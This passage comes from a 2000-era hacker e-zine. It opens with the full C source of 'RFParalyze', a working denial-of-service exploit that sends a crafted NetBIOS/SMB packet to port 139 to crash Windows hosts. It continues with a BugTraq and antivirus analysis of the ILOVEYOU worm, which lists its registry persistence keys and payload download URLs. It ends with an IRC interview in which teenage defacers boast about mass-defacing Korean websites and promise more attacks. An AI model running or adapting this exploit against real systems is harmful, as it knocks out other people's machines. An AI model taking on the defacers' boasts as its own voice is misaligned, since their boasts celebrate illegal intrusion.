Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
I have only tested this code on Linux. Hey, at least it's
not in perl... ;) -rfp
*/
#include <stdio.h> /* It's such a shame to waste */
#include <stdlib.h> /* this usable space. Instead, */
#include <string.h> /* we'll just make it more */
#include <netdb.h> /* props to the men and women */
#include <sys/socket.h> /* (hi Tabi!) of #!adm and */
#include <sys/types.h> /* #!w00w00, because they rock */
#include <netinet/in.h> /* so much. And we can't forget*/
#include <unistd.h> /* our friends at eEye or */
#include <string.h> /* Attrition. Oh, +hi Sioda. :) */
/* Magic winpopup message
This is from \\Beav\beavis and says "yeh yeh"
Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";
struct sreq /* little structure of netbios session request */
{
char first[5];
char yoname[32];
char sep[2];
char myname[32];
char end[1];
};
void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/
int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;
printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");
if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf(" --IP must be ip address, not dns\n");
printf(" --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}
printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");
Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
myname[30]='A'; /* how was Beltaine? :) */
myname[31]='D';
Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);
sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family = AF_INET;
sin.sin_port = htons(139);
sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
perror("Problems connecting: ");
exit(1);}
memset(buf,0,4000);
memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
memcpy(smbreq.end,"\x00",1); /*what it does :) */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);
write(sox,&smbreq,72); /* send initial request */
x=read(sox,buf,4000); /* get their response */
if(x<1){ printf("Problem, didn't get response\n");
exit(1);}
if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
exit(1);}
write(sox,&blowup,72); /* send the magic message >:) */
x=read(sox,buf,4000); /* we really don't care, but sure */
close(sox);
printf("done\n");
}
void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
int i, len;
len = strlen(name1);
for (i = 0; i < 16; i++) {
if (i >= len) {
c1 = 'C'; c2 = 'A'; /* CA is a space */
} else {
c = name1[i];
c1 = (char)((int)c/16 + (int)'A');
c2 = (char)((int)c%16 + (int)'A');
}
name2[i*2] = c1;
name2[i*2+1] = c2;
}
name2[32] = 0; /* Put in the null ...*/
}
/*********************************** www.el8.org **** www.wiretrip.net **/
-/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\-
@HWA
16.0 [MM] New worm: ILOVEYOU spreads via e-mail attachments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This email worm originated in the Phillipines, when I first became aware
of it Britain was being hit hard by the nuisance, and by late afternoon
the same day it had proliferated across the net to the U.S and Canada
I got a call from my sister at work who had recieved 16 ILOVEYOU emails
at that time, later on the media began reporting it and in my news
emails that were warning of the virus the very same emails were themselves
infected and multiple copies were received.
Not 24hrs had passed before several variations of the insiduous pest had
appeared such as the JOKE and VERY FUNNY variations. You'd think we were
past this sort of annoyance but it seems shoddy programming and planning
is going to be a fact of life for a good while to come yet. - Ed
Media:
Source: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000504095618.N24513@securityfocus.com
[ by Message ] [ by Thread ]
[ Post ][ Reply ]
To:BugTraq
Subject:ILOVEYOU worm
Date:Wed May 03 2000 18:56:18
Author: Elias Levy
Message-ID:<20000504095618.N24513@securityfocus.com>
A new VB worm is on the loose. This would normally not be bugtraq
material as it exploits no new flaws but it has spread enough that it
warrants some coverage. This is a quick and dirty analysis of what it does.
The worm spreads via email as an attachments and via IRC as a DCC download.
The first thing the worm does when executed is save itself to three
different locations. Under the system directory as MSKernel32.vbs and
LOVE-LETTER-FOR-YOU.TXT.vbs and under the windows directory as
Win32DLL.vbs.
It then creates a number of registry entries to execute these programs
when the machine restarts. These entries are:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
It will also modify Internet Explorer's start page to point to a web page
that downloads a binary called WIN-BUGSFIX.exe. It randomly selects between
four different URLs:
http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe
I've not been able to obtain copy of the binary to figure out what it does.
This does mean the worm has a dynamic components that may change its
behavior any time the binary is changed and a new one downloaded.
The worm then changes a number of registry keys to run the downloaded binary
and to clean up after itself.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
about:blank
The worm then creates an HTML file that helps it spread,
LOVE-LETTER-FOR-YOU.HTM. This is the file DCC'ed to others on IRC.
The worm then spreads to all addresses in the Windows Address Book by
sending the file LOVE-LETTER-FOR-YOU.TXT.vbs as an attachment. The
email starts:
kindly check the attached LOVELETTER coming from me.
Then the virus searches for attached drives looking for files with
certain extensions. It overwrites files ending with vbs, and vbe.
It overwrites files ending with js, jse, css, wsh, sct, and hta, and
then renames them to end with vbs. It overwrites files ending with jpg
and jpeg and appends .vbs to their name. It finds files with the name
mp3 and mp3, creates vbs files with the same name and sets the hidden
attribute in the original mp* files.
The it looks for the mIRC windows IRC client and overwrites the script.ini
file if found. It modifies this file to that it will DCC the
LOVE-LETTER-FOR-YOU.HTM file to any people that join a channel the
client is in.
You can find the source of the worm at:
http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1
--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
-=-
I-Worm.LoveLetter
I-Worm.LoveLetter is Internet worm written in the scripting language "Visual Basic Script"
(VBS). It works only on computers on which the Windows Scripting Host (WSH) is installed. In
Windwos 98 and Windows 2000, WHS is installed by default. The worm performs destructive
actions and sends its copy bye E-mail.
Destructive actions
After starting from the VBS file the worm searches all files on all local and mapped network
drivers. For some extensions of filenames the worm does the following:
VBS, VBE:
Overwrites files with the worm body.
JS, JSE, CSS, VSH, HST, HTA:
Creates a new file with original filename and extention .VBS and deletes original file.
JPG, JPEG:
Creates new file with extention .VBS (adds this extention to old file name and extention) (i.e.
PIC1.JPG.VBS). Writes worm body to it and deletes original file.
MP2, MP3:
Creates a new file with extention .VBS (adds to old file name, see above for details). It writes
its body to it and sets thef file attribute "hidden" to the original file.
MIRC32.EXE, MLINK32.EXE, SCRIPT.INI, MIRC.HLP, MIRC.INI:
If one of these files was found the worm creates the file SCRIPT.INI in the directory were one of
the above files resides.
The worm also creates some files with its body in system directory.
MSKERNEL32.VBS, WIN32DLL.VBS, LOVE-LETTER-FOR-YOU.TXT.VBS
It sets appropriates keys in the system registry (Automatic run keys) with full names of files:
MSKernel32.vbs, Win32DLL.vbs
It adds system registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Spreading via E-mail
The worm sends itself via E-mail. To achieve this the worm sends itself to each address from
address book. It works only when the email program Outlook 97/98/2000 is installed.
The letter's subject:
ILOVEYOU
Message body:
kindly check the attached LOVELETTER coming from me.
Attached file name:
LOVE-LETTER-FOR-YOU.TXT.vbs
The virus creates a HTML dropper in Windows system directory. The HTML dropper displays
the message:
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press 'YES' button to Enable ActiveX
After this the dropper creates the MSKERNEL32.VBS with the worm body and sets it for auto
execution from system registry.
@HWA
17.0 [HWA] May 4th 2000: SugarKing interviews ph33r the b33r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exclusive interview by HWA staff writer SugarKing
Contact him at: sugaking@gis.net
Or editor at: cruciphux@dok.org
Session Start: Thu May 04 21:15:55 2000
[21:15] *** Now talking in #vivalaresistance
[21:16] <p4ntera> lets do this
[21:16] <SugarKing> lock the channel
[21:16] <p4ntera> no one knows of it
[21:16] <p4ntera> i cant
[21:16] <p4ntera> lol
[21:16] <SugarKing> ok
[21:16] <SugarKing> heh
[21:16] <SugarKing> one sec bro
[21:16] <p4ntera> werd
[21:16] <SugarKing> talking to a chick on the phone:)
[21:17] <p4ntera> heh
[21:17] <p4ntera> hurry mon aint got much time
[21:17] <SugarKing> alright
[21:17] <SugarKing> logging now
[21:17] <SugarKing> aight
[21:17] <SugarKing> you guys don't have to answer anything
[21:17] <SugarKing> just say no comment:)
[21:17] <p4ntera> iight
<SNIP>
[21:17] <p4ntera> wtf
[21:17] <SugarKing> heh
[21:18] <Da_Pest> Whats up?
[21:18] <Da_Pest> Yo we gonna start?
[21:18] <SugarKing> so how long has ph33r the b33r been a group?
[21:18] <SugarKing> we're already starting:)
[21:18] <p4ntera> well
[21:18] <Da_Pest> Ok : )
[21:18] <p4ntera> i recruited people from the early october
[21:18] <p4ntera> so lets say october
[21:18] <SugarKing> ok...
[21:18] <Da_Pest> I joined probably in december or november
[21:18] <Da_Pest> Which one was it p4ntera?
[21:18] <p4ntera> november
[21:19] <Da_Pest> k
[21:19] <SugarKing> so you started the group, p4ntera?
[21:19] <p4ntera> yes
[21:19] <SugarKing> any reason?
[21:19] <p4ntera> well
[21:19] <SugarKing> and what's with the name?
[21:19] <p4ntera> because there wasn't much action going around in the underground
[21:19] <Da_Pest> LoL
[21:19] <Da_Pest> that name is joax
[21:19] <p4ntera> so
[21:19] <p4ntera> i wanted people to know the "scene" aint dead
[21:19] <p4ntera> the name?
[21:19] <p4ntera> lmao
[21:19] <p4ntera> well its a LONNNG story
[21:20] <Da_Pest> Very long
[21:20] <SugarKing> heh
[21:20] <p4ntera> yeah
[21:20] <Da_Pest> he told me once
[21:20] <Da_Pest> Dont wanna hear it again
[21:20] <p4ntera> u still wanna hear it?
[21:20] <SugarKing> nah that's ok
[21:20] <SugarKing> save some time
[21:20] <p4ntera> yeah
[21:20] <SugarKing> so how many members to date?
[21:20] <p4ntera> holy shit
[21:20] <p4ntera> loll
[21:20] <p4ntera> 14+
[21:20] <Da_Pest> 15?
[21:20] <p4ntera> most are just shadow members
[21:20] <p4ntera> who remain in the background
[21:20] <Da_Pest> Yah
[21:21] <Da_Pest> Wait let me think
[21:21] <Da_Pest> Yah 15 or 16 i can remember
[21:21] <SugarKing> that's alot
[21:21] <p4ntera> yeah
[21:21] <SugarKing> u guys know how many sites you've defaced so far?
[21:21] <p4ntera> next?
[21:21] <p4ntera> another holy shit =)
[21:21] <p4ntera> i would say 20+
[21:21] <Da_Pest> LoL
[21:21] <SugarKing> or don't keep count?
[21:21] <SugarKing> 20+?
[21:21] <p4ntera> yeah
[21:21] <SugarKing> I would say 40
[21:22] <Da_Pest> And many more to come
[21:22] <SugarKing> just guessing
[21:22] <SugarKing> heh
[21:22] <p4ntera> well
[21:22] <p4ntera> i dont wanna sound cocky
[21:22] <p4ntera> =)
[21:22] <SugarKing> why do you guys deface? fame?
[21:22] <p4ntera> nah
[21:22] <p4ntera> well i like to show people the underground aint dead
[21:22] <p4ntera> and well
[21:22] <p4ntera> some for fame too
[21:22] <p4ntera> but not all
[21:23] <SugarKing> what do you mean "the underground aint dead"?
[21:23] <Da_Pest> Yah i agree
[21:23] <p4ntera> hence why we havent defaced the higher up sites
[21:23] <p4ntera> well
[21:23] <p4ntera> look on attrition
[21:23] <p4ntera> mostly frontpage kiddies, or brazilian kids who cant speak
[21:23] <p4ntera> english
[21:23] <p4ntera> or both
[21:23] <SugarKing> hah ya
[21:23] <Da_Pest> MSADC GALORE
[21:23] <p4ntera> i say the 2 go together in the same sentence
[21:23] <Da_Pest> HAHA
[21:23] <p4ntera> da_pest, dont even give em that =)
[21:23] <Da_Pest> lol
[21:23] <Da_Pest> Tru dat
[21:24] <SugarKing> hah
[21:24] <p4ntera> next?
[21:24] <SugarKing> you guys afraid of being busted?
[21:24] <p4ntera> hell yeah
[21:24] <Da_Pest> Of course
[21:24] <p4ntera> i dont wanna have a friend named backdoor billy
[21:24] <SugarKing> then why do you keep defacing?
[21:24] <p4ntera> well
[21:24] <Da_Pest> You think i want bull shit on my record lol
[21:24] <p4ntera> we're in it now
[21:24] <p4ntera> we can't stop
[21:24] <p4ntera> plus i dont wanna
[21:25] <SugarKing> ya you can
[21:25] <SugarKing> I did
[21:25] <SugarKing> don't wanna? why?
[21:25] <p4ntera> i cover my tracks well, and i hide myself
[21:25] <p4ntera> i like defacing
[21:25] <Da_Pest> Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
[21:25] <Da_Pest> same
[21:25] <Da_Pest> :)
[21:25] <p4ntera> hes right
[21:25] <SugarKing> what about ethics?
[21:25] <p4ntera> well
[21:25] <SugarKing> i did it for awhile
[21:25] <p4ntera> i rarely do medical sites
[21:26] <SugarKing> but i don't think it's right
[21:26] <SugarKing> not needed
[21:26] <p4ntera> no msadc
[21:26] <SugarKing> eh
[21:26] <SugarKing> heh
[21:26] <p4ntera> and usually if i feel sorry for the admin
[21:26] <p4ntera> i give him the patch
[21:26] <SugarKing> if you feel sorry?
[21:26] <Da_Pest> I think its safe to say NT will be out of PTB for a bit eh p4ntera?
[21:26] <SugarKing> haha
[21:26] <p4ntera> thats right
[21:26] <p4ntera> but now we're going for countries
[21:27] <Da_Pest> Oh yah
[21:27] <SugarKing> countries?
[21:27] <p4ntera> as you might have saw, we raped korea pretty bad
[21:27] <p4ntera> =)
[21:27] <SugarKing> ya i noticed a bit
[21:27] <p4ntera> yeah
[21:27] <Da_Pest> Yah'
[21:27] <p4ntera> next is a country that everyone hates
[21:27] <p4ntera> we plan to finish it up tommorow (korean sites that is)
[21:27] <Da_Pest> Yah
[21:28] <SugarKing> what about others calling you guys script kiddies and indeed having script kiddies as members
[21:28] <Da_Pest> We gonna clean up the .kr tomorow eh p4ntera?
[21:28] <p4ntera> well
[21:28] <SugarKing> not to name any *cough*artech*cough*
[21:28] <SugarKing> :)
[21:28] <p4ntera> lets not get into artech
[21:28] <Da_Pest> Ok artech
[21:28] <Da_Pest> I d liek to say something about him
[21:28] <p4ntera> i consider a script kiddie someone who uses scripts and not knows what it actually does
[21:28] <Da_Pest> sorry like
[21:28] <SugarKing> go ahead:)
[21:28] <Da_Pest> Ok
[21:28] <Da_Pest> He is basically a frontpage KIDDY
[21:28] <p4ntera> yeah
[21:29] <SugarKing> yeah I noticed
[21:29] <SugarKing> aol kiddie
[21:29] <p4ntera> he doesnt even know what NTLM authentication is
[21:29] <p4ntera> or
[21:29] <p4ntera> how he uses the everyone/guest group to hack with frontpage
[21:29] <p4ntera> he just randomly tries sites
[21:29] <Da_Pest> He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
[21:29] <p4ntera> which is pretty fucking lame
[21:29] <Da_Pest> Ok
[21:29] <Da_Pest> Go on attrition
[21:29] <Da_Pest> and look at his hacks
[21:29] <Da_Pest> Im pretty sure every one of them is NT
[21:29] <p4ntera> nah thats not important
[21:29] <SugarKing> yeah they are
[21:29] <p4ntera> lets move on to something else
[21:29] <SugarKing> i don't think he knows what linux is
[21:30] <p4ntera> NT can be raped other ways
[21:30] <Da_Pest> Yah
[21:30] <p4ntera> as u saw with what i did
[21:30] <Da_Pest> But he uses only frontpage
[21:30] <SugarKing> yeah
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> that is correct
[21:30] <SugarKing> how many memebers code?
[21:30] <p4ntera> netbios is a weak fucking protocol
[21:30] <p4ntera> well
[21:30] <Da_Pest> LoL
[21:30] <p4ntera> 5-8
[21:30] <Da_Pest> Very very weak
[21:30] <SugarKing> you guys plan on releasing any exploits you may have written?
[21:30] <p4ntera> yeas
[21:30] <p4ntera> very soon
[21:30] <Da_Pest> Yep
[21:30] <p4ntera> we are probably gonna release some scanners
[21:30] <p4ntera> then maybe some exploits
[21:30] <Da_Pest> Yeah
[21:30] <SugarKing> cool
[21:31] <p4ntera> depends how much sexor i get in the next few days
[21:31] <SugarKing> hah
[21:31] <Da_Pest> LoL
[21:31] <Da_Pest> You know ill be getting sex0r from 3r1/\/ lol
[21:31] <SugarKing> so all members are generally kids? 15-18?
[21:31] <p4ntera> yeah muthafuckas
[21:31] <p4ntera> =)
[21:31] <p4ntera> no
[21:31] <Da_Pest> lol
[21:31] <p4ntera> we have some universty members
[21:31] <p4ntera> but none too old
[21:31] <p4ntera> none too young
[21:31] <SugarKing> oh
[21:31] <p4ntera> around your difference
[21:31] <p4ntera> as u said
[21:32] <SugarKing> what are you guys trying to prove by defacing?
[21:32] <SugarKing> anything?
[21:32] <p4ntera> like i said
[21:32] <p4ntera> the underground aint dead
[21:32] <p4ntera> and
[21:32] <p4ntera> that we, as kids, will not take the bullshit the media spews forth
[21:32] <p4ntera> about hackers and the like
[21:32] <SugarKing> yeah
[21:33] <Da_Pest> Yep
[21:33] <SugarKing> hmm
[21:33] <Da_Pest> I dont like the stereo types
[21:33] <SugarKing> do you guys have a site?
[21:33] <p4ntera> not yet
[21:33] <p4ntera> we will have one, one of our members needs 2 way cable
[21:33] <p4ntera> :P
[21:33] <p4ntera> www.b33r.com soon
[21:33] <SugarKing> heheh cool
[21:33] <Da_Pest> Plus we dont even really need one as of this monet
[21:34] <Da_Pest> moment
[21:34] <SugarKing> ya
[21:34] <Da_Pest> errr.....
[21:34] <SugarKing> do you guys plan on ever stop defacing?
[21:34] <Da_Pest> Me No!
[21:34] <Da_Pest> Well not for a while at least
[21:35] <SugarKing> p4ntera?
[21:35] <Da_Pest> He is afk
[21:35] <SugarKing> oh
[21:35] <Da_Pest> he is walkin his dog for a sec
[21:35] <SugarKing> hah ok
[21:35] <Da_Pest> He will brb
[21:35] <Da_Pest> :)
[21:35] <SugarKing> i hate dogs
[21:35] <SugarKing> they're Pest's:P
[21:35] <Da_Pest> Why?
[21:35] <Da_Pest> Like me : )
[21:35] <SugarKing> ya
[21:36] <Da_Pest> I lub puppys
[21:36] <Da_Pest> :)
[21:36] <Da_Pest> U gots any other questions?
[21:36] <SugarKing> ya, i'm waiting for p4ntera though
[21:36] <Da_Pest> Oh ok
[21:37] *** p4ntera has quit IRC (Ping timeout�)
[21:37] <SugarKing> hrm
[21:37] <SugarKing> he'll be back
[21:38] <Da_Pest> Yah
[21:38] <SugarKing> so do you use different handles on IRC because you're afraid of getting caught?
[21:38] <Da_Pest> Not so much getting caught just the fact i dont want to be bothered
[21:39] <Da_Pest> I dont want some kid to see my defacements and bug me on irc
[21:39] <SugarKing> ya
[21:39] <SugarKing> how'd you meet p4ntera?
[21:39] <Da_Pest> but partly because of the illegal activities factor =
[21:39] <Da_Pest> Honestly we live about a few blocks away from eachother
[21:40] <SugarKing> hah cool
[21:40] <Da_Pest> Yah
[21:40] <SugarKing> do you guys talk about your defacements and shit in school?
[21:41] <Da_Pest> Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
[21:41] <Da_Pest> Shit sorry for my spelling
[21:41] <Da_Pest> Im just really cold
[21:41] <SugarKing> do your friends know that you guys are into computers?
[21:41] <SugarKing> heh
[21:41] <SugarKing> it's aight
[21:42] <Da_Pest> Umm... Well some do but I dont think any know im into defacing
[21:42] <Da_Pest> Me and p4ntera are the only ones out of my cru that are into this shit
[21:42] <SugarKing> ya
[21:43] <SugarKing> same as me and Clientel
[21:43] <Da_Pest> cool
[21:43] <SugarKing> we have one class together and he doesn't shut the hell up
[21:43] <Da_Pest> LoL
[21:43] <Da_Pest> What does he talk about?
[21:44] <SugarKing> about his elite defacements
[21:44] <SugarKing> haha nah
[21:44] <Da_Pest> brb man im gonna log on a nother server im lagged
[21:44] <SugarKing> he talks about computers in general
[21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?�)
[21:44] <SugarKing> aight
[21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
[21:45] <Da_Pest> Back!
[21:46] <SugarKing> ok
[21:46] <SugarKing> where the hell is p4ntera?
[21:46] <Da_Pest> He walking his damn dog
[21:46] <SugarKing> i'll kill it
[21:46] <Da_Pest> Sorry bout the wait
[21:46] <Da_Pest> LoL
[21:46] <Da_Pest> he should be here soon
[21:47] <SugarKing> ok
[21:47] <Da_Pest> sorry for the wait
[21:47] <SugarKing> np
[21:48] <Da_Pest> do u code?
[21:48] <SugarKing> yup
[21:48] <SugarKing> btw, to set the record, since i'm logging and it's going to be posted
[21:48] <SugarKing> I left this group because it was only defacing
[21:49] <SugarKing> I didn't want to do it no more
[21:49] <Da_Pest> Ok...
[21:49] <SugarKing> I'll keep my opinion about defacing to myself
[21:49] <Da_Pest> Why not?
[21:49] <SugarKing> but, I'd rather code some nasty shit:)
[21:49] <Da_Pest> ok gitcha
[21:49] <Da_Pest> Alot of people dont like defacing
[21:50] <Da_Pest> But the way I see it...
[21:50] <SugarKing> I don't see a need for it
[21:50] <Da_Pest> If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
[21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
[21:51] <SugarKing> wb
[21:51] <SugarKing> dog walker:P
[21:51] <p4ntera> thanks
[21:51] <p4ntera> sorry about that
[21:51] <p4ntera> hah
[21:51] <Da_Pest> Yah wb
[21:51] <p4ntera> yeah man your mom is rough with the leash
[21:51] <p4ntera> she keeps on bitin git
[21:51] <Da_Pest> loil
[21:51] <p4ntera> *biting it
[21:51] <SugarKing> anyways
[21:51] <p4ntera> =)
[21:51] <SugarKing> back to the question
[21:51] <SugarKing> do you guys plan on ever stop defacing?
[21:51] <p4ntera> yeah anyways
[21:51] <p4ntera> maybe
[21:51] <p4ntera> when some of us gets booked
[21:52] <p4ntera> or we own the world
[21:52] <Da_Pest> LoL
[21:52] <p4ntera> which ever one comes first
[21:52] <SugarKing> heh
[21:52] <Da_Pest> Me never I wont stop
[21:52] <p4ntera> yeah he well
[21:52] <p4ntera> *will
[21:52] <Da_Pest> I enjoy it
[21:52] <p4ntera> i would just like to add something?
[21:52] <p4ntera> if thats alright?
[21:52] <SugarKing> go ahead
[21:52] <SugarKing> you got the floor:)
[21:52] <Da_Pest> I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
[21:52] <p4ntera> you asked whats with the "underground aint dead part"
[21:52] <SugarKing> ya
[21:52] <p4ntera> well
[21:52] <p4ntera> if u noticed last year
[21:53] <p4ntera> groups like gH,irc.psychic.com and h4g15 were defacing major websites
[21:53] <SugarKing> ya
[21:53] <p4ntera> showing there weak security
[21:53] <p4ntera> now we got people like "crime boys" and artech defacing websites
[21:53] <Da_Pest> Exactly
[21:53] <p4ntera> and these are the people that will protect potentially high up websites?
[21:53] <p4ntera> i dont want my bank card protected by these frontpage kiddies
[21:54] <Da_Pest> Ok course
[21:54] <p4ntera> u know what i mean?
[21:54] <SugarKing> yah
[21:54] <Da_Pest> and the sad part is alot of admins are like that
[21:54] <SugarKing> true in a sense
[21:54] <p4ntera> yeah thats right they are
[21:54] <Da_Pest> And i mean alot
[21:54] <SugarKing> but what about groups like L0pht, who made their fame without defacing?
[21:54] <p4ntera> well
[21:54] <p4ntera> they were made in the 80's
[21:54] <Da_Pest> Like look at all of artechs for god sakes
[21:54] <p4ntera> when defacing was unheard of
[21:55] <p4ntera> bbs hacking
[21:55] <SugarKing> what about now?
[21:55] <p4ntera> they did do the potentially "dark" side of hacking
[21:55] <SugarKing> they could easily deface now
[21:55] <p4ntera> yeah but they outgrown that
[21:55] <p4ntera> its kind of a teenage thing
[21:55] <SugarKing> so you saying you're gonna outgrow it?
[21:55] <p4ntera> fuck when i heard mosthated was 19 i was shocked
[21:55] <p4ntera> eventually
[21:55] <SugarKing> heh
[21:55] <SugarKing> ya
[21:56] <Da_Pest> I dont think I will
[21:56] <Da_Pest> until i get booked
[21:56] <p4ntera> yeah he will
[21:56] <p4ntera> heh
[21:56] <p4ntera> anyways
[21:56] <Da_Pest> Umm...
[21:56] <Da_Pest> No
[21:56] <SugarKing> in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
[21:56] <p4ntera> yeah
[21:56] <SugarKing> which is true
[21:56] <p4ntera> funny thing is
[21:56] <Da_Pest> Tru dat
[21:56] <p4ntera> we have 2 members of team echo
[21:56] <p4ntera> in our group
[21:56] <p4ntera> nameless of course
[21:56] <SugarKing> ya I know
[21:56] <Da_Pest> hehe =)
[21:56] <p4ntera> well, had
[21:56] <SugarKing> had?
[21:56] <p4ntera> one got booked
[21:56] <SugarKing> they left?
[21:57] <SugarKing> who?
[21:57] <p4ntera> another one is still in
[21:57] <p4ntera> Analognet
[21:57] <SugarKing> Analognet was in ph33r the b33r?
[21:57] <p4ntera> yep
[21:57] <Da_Pest> :)
[21:57] <p4ntera> dont be so shocked
[21:57] <SugarKing> i didn't know
[21:57] <p4ntera> u know who taught him how to hack nt?
[21:57] <p4ntera> your talking to him right now
[21:57] <SugarKing> heh
[21:57] <p4ntera> he learned very fast
[21:57] <Da_Pest> p4ntera is truly 1337 sh1t lol
[21:57] <p4ntera> within a month he knew what i knew
[21:57] <Da_Pest> He taught me alot
[21:58] <p4ntera> and became a nt admin
[21:58] <p4ntera> damn right negro
[21:58] <SugarKing> cool
[21:58] <p4ntera> =)
[21:58] <Da_Pest> I think as a group we are progressing
[21:58] <p4ntera> i totally agree
[21:58] <p4ntera> 100%
[21:58] <SugarKing> so anything we should know about with the future of ph33r the b33r?
[21:58] <p4ntera> yeah
[21:58] <Da_Pest> We are slowly moving are way up to bigger and better things
[21:58] <p4ntera> we are going to be big
[21:58] <p4ntera> as da_pest is saying
[21:59] <Da_Pest> And eventually we are gonna pull a gH and own a big ass site
[21:59] <p4ntera> we are the only thing that comes close to a good group
[21:59] <p4ntera> of course
[21:59] <Da_Pest> And that will be a grand finale
[21:59] <p4ntera> my boys wkD are there with us
[21:59] <Da_Pest> Yah
[21:59] <SugarKing> oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
[21:59] <p4ntera> werd ka0x and BlazinWeed =)
[21:59] <p4ntera> no
[21:59] <p4ntera> i know my rights
[21:59] <p4ntera> too well in fact
[21:59] <Da_Pest> Same
[21:59] <p4ntera> entrapment is a beautifal thing my friend
[21:59] <p4ntera> =)
[22:00] <Da_Pest> Plus we make sure people are legit before they join
[22:00] <p4ntera> and thats why we hang on lame networks
[22:00] <SugarKing> any last comments? shout out's? flames?
[22:00] <p4ntera> cause efnet is like 98% sniffed
[22:00] <p4ntera> well
[22:00] <p4ntera> i would like to say to sinfony, aka john dough
[22:00] <Da_Pest> lol
[22:00] <Da_Pest> DIE
[22:00] <p4ntera> that i respect his skills
[22:00] <p4ntera> i recently found out he is r3p3nt from dhc, which kinda sucks for me
[22:00] <p4ntera> because i respect dhc as a group
[22:00] <p4ntera> and him especially
[22:01] <p4ntera> even though he flamed us
[22:01] <p4ntera> he has his skills
[22:01] <p4ntera> but he is still a ass
[22:01] <p4ntera> that will likely never change
[22:01] <Da_Pest> hehe :)
[22:01] <SugarKing> heh
[22:01] <SugarKing> anything from you, Pest?
[22:01] <Da_Pest> He is a bigger ass then m4rth4 lol
[22:01] <Da_Pest> Yah i just gotta say look out bitches cause PTB Is climbing our way up
[22:01] <p4ntera> heh
[22:02] <Da_Pest> And soon we will not be able to be touched
[22:02] <p4ntera> i would like to say some more as well
[22:02] <p4ntera> that is right
[22:02] <p4ntera> these 3rd world countries are our playgrounds
[22:02] <p4ntera> once we master our abilities, we are coming for the higher ups
[22:02] <Da_Pest> Yah
[22:02] <SugarKing> that it?:)
[22:02] <p4ntera> once we recruit some more members, we are coming
[22:02] <p4ntera> you cannot stop it
[22:02] <p4ntera> no one can =)
[22:02] <Da_Pest> Oh Yah
[22:03] <p4ntera> and
[22:03] <p4ntera> i would like to say
[22:03] <p4ntera> Sugarking is one sexy cum muffin
